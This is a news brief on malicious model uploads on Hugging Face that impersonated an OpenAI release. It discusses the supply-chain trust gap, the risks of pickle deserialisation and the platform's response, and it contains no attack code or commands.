- Hugging Face hosted malicious software packaged and named to mimic an OpenAI release, AI News reported on May 12.
- The malware was distributed via the model registry’s standard download flow, exploiting users’ trust in the platform’s namespace.
- The incident underscores the absence of strong author-verification primitives on the world’s largest open AI model registry.
- Hugging Face has removed the offending uploads and is reviewing additional uploads tied to the same author accounts.
What Happened
Hugging Face, the largest open-source registry of AI models and datasets, hosted malicious software masquerading as a legitimate OpenAI release, AI News reported on Tuesday. The malicious uploads used naming conventions and metadata designed to convince developers that they were downloading an official OpenAI-published artefact. The packages were distributed through the standard model-download flow used by millions of developers integrating Hugging Face into local environments and CI pipelines.
Why It Matters
The incident exposes a structural gap in supply-chain security for open AI distribution. Hugging Face’s namespace allows third-party uploads under arbitrary author names; unlike package managers such as npm or PyPI, which have added typo-squatting and signature controls in recent years, Hugging Face’s verified-publisher signals are limited and inconsistently surfaced in the user interface. Researchers at ReversingLabs and JFrog documented similar Hugging Face malware incidents in 2024 and 2025, but the impersonation-of-OpenAI vector elevates the risk profile by exploiting the most trusted brand in the AI namespace.
Technical Details
The malicious uploads were structured as model artefacts that, when loaded with standard Hugging Face Transformers or other library functions, execute code on the host machine. Hugging Face has previously warned that pickle-based serialization formats — common in older model checkpoints — allow arbitrary code execution on deserialisation. The platform has been migrating users toward the safer Safetensors format, but pickle-based files remain in wide circulation. AI News did not name the specific exploitation technique used in this incident; comparable past cases have employed Python’s pickle deserialisation, malicious tokenizer scripts, and malicious post-install hooks. Hugging Face has confirmed removal of the offending uploads and is reviewing additional artefacts associated with the same uploader accounts.
Who’s Affected
Any developer who downloaded the impersonating artefact may have executed the malicious code in their local Python environment. Enterprise security teams that have whitelisted Hugging Face as a trusted source for model artefacts should reassess that posture. The incident is particularly relevant for organisations that pull models in CI/CD pipelines, where compromise can propagate quickly. Hugging Face has more than 5 million users and hosts over 1.7 million model repositories, per the company’s published statistics — the absolute scale that makes the platform indispensable also makes any namespace-trust failure broadly consequential. OpenAI is the affected impersonated party and has not, per the report, issued a public statement.
What’s Next
Hugging Face has historically responded to malware incidents by tightening repository scanning and accelerating Safetensors adoption. Expect renewed pressure for verified-publisher badges to be made more prominent in the model-card UI and for Transformers library defaults to refuse pickle-based loads unless explicitly opted in. Industry working groups, including the AI Verification Foundation and SLSA’s adoption track for ML artefacts, will likely reference the incident in upcoming reports. Enterprises pulling open models in production should audit their dependency pipelines and prefer artefacts pinned by repository hash rather than by author name alone.
